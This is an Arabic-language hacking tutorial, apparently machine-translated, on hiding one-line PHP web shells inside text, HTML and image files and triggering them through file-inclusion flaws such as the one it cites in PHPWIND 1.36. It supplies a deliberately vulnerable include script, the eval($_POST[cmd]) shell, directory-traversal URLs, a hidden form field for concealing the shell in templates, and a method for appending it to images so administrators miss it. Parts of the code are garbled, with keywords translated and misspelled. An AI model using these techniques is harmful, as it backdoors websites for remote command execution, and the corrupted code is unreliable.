يجب أن تعلم أنه إذا قمت للتو بوضع عبارة PHP في الصورة، فلن يتم تنفيذها على أي حال، لأن PHP تقوم فقط بتحليل الملفات ذات الامتداد php. لذلك من الضروري أن تكون قادرًا على تنفيذ عبارات PHP المخفية في الصورة. نحن نستخدم فقط وظائف الاستدعاء في PHP: تضمين، طلب، وما إلى ذلك.
ما زلنا نتذكر مقال إخفاء أحصنة طروادة في الصور قبل أيام قليلة. أي، استخدم عبارات مثل include("x.gif") في ملف PHP لاستدعاء عبارات حصان طروادة المخفية في الصورة. البيانات في ASP متشابهة. يبدو الأمر مخفيًا للغاية، ولكن إذا قمت باستدعاء الصورة مباشرةً، فلن يكون من الصعب على شخص يعرف القليل عن PHP العثور على شيء مريب. نظرًا لصعوبة تمرير المعلمات باستخدام طريقة GET في عنوان URL، لا يمكن الاستفادة من أداء إدراج حصان طروادة بشكل كامل.
تُستخدم وظيفة التضمين بشكل متكرر في PHP، لذا فهي تسبب الكثير من مشكلات الأمان. على سبيل المثال، ترجع ثغرة PHPWIND1.36 إلى عدم تصفية المتغيرات خلف التضمين. من هذا يمكننا إنشاء عبارات مماثلة لإدراجها في ملفات PHP. ثم قم بإخفاء حصان طروادة في صورة أو ملف HTML، والذي يمكن القول بأنه أكثر إخفاءًا. على سبيل المثال، أدخل العبارة التالية في منتدى PHPWIND: < ''?@include includ/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>> لا يمكن للمسؤولين العامين رؤيتها.
بمساعدة وظيفة التضمين، يمكننا إخفاء أحصنة طروادة PHP في العديد من أنواع الملفات مثل ملفات txt وhtml وملفات الصور. ونظرًا لأن هذه الأنواع الثلاثة من الملفات، ملفات txt وhtml وملفات الصور، هي الأكثر شيوعًا في المنتديات وأنظمة المقالات، فسوف نقوم بإجراء الاختبارات بالترتيب أدناه.
قم أولاً بإنشاء ملف PHP test.php، ومحتوى الملف هو:
<?php
$test=$_GET['test'];
@ تضمين 'اختبار/'.$test;
>
ملفات Txt هي بشكل عام ملفات وصف، لذا يمكننا وضع حصان طروادة المكون من جملة واحدة في ملف الوصف بالدليل. فقط قم بإنشاء ملف TXT t.txt. نقوم بلصق جملة حصان طروادة <?eval($_POST[cmd]);?> في ملف t.txt. ثم قم بزيارة http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt > إذا رأيت t يثبت محتوى txt أنه موافق. ثم قم بإضافة عنوان حصان طروادة لعميل الباب الخلفي lanker micro PHP إلى http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php? PHPWIND_ROOT=../robots.txt > فقط أضف cmd في كلمة المرور، ويمكنك رؤية النتائج التي تم إرجاعها عن طريق التنفيذ.
بالنسبة لملفات HTML، فهي بشكل عام ملفات قالب. من أجل تمكين حصان طروادة المدرج في ملف HTML من استدعائه وتنفيذه دون عرضه، يمكننا إضافة مربع نص بسمات مخفية في HTML، مثل: <input type=hidden value="<?eval($ _POST[cmd ]);?>"> ثم استخدم نفس الطريقة المذكورة أعلاه. يمكن رؤية نتائج التنفيذ بشكل عام من خلال عرض الملف المصدر. على سبيل المثال، استخدم وظيفة عرض دليل هذا البرنامج. عرض محتوى الملف المصدر كـ <input type=hidden value="C:Uniserver2_7swwwtest"> يمكنني الحصول على الدليل كـ C:Uniserver2_7swwwtest.
الآن دعونا نتحدث عن ملفات الصور، والخدعة الأكثر سمية هي إخفاء حصان طروادة في الصورة. يمكننا تحرير الصورة مباشرة وإدراج <?evall($_POST[cmd]);?> في نهاية الصورة.
بعد الاختبار، لا يؤثر ذلك على الصورة بشكل عام. ثم قم بإضافة عنوان حصان طروادة للعميل بنفس الطريقة<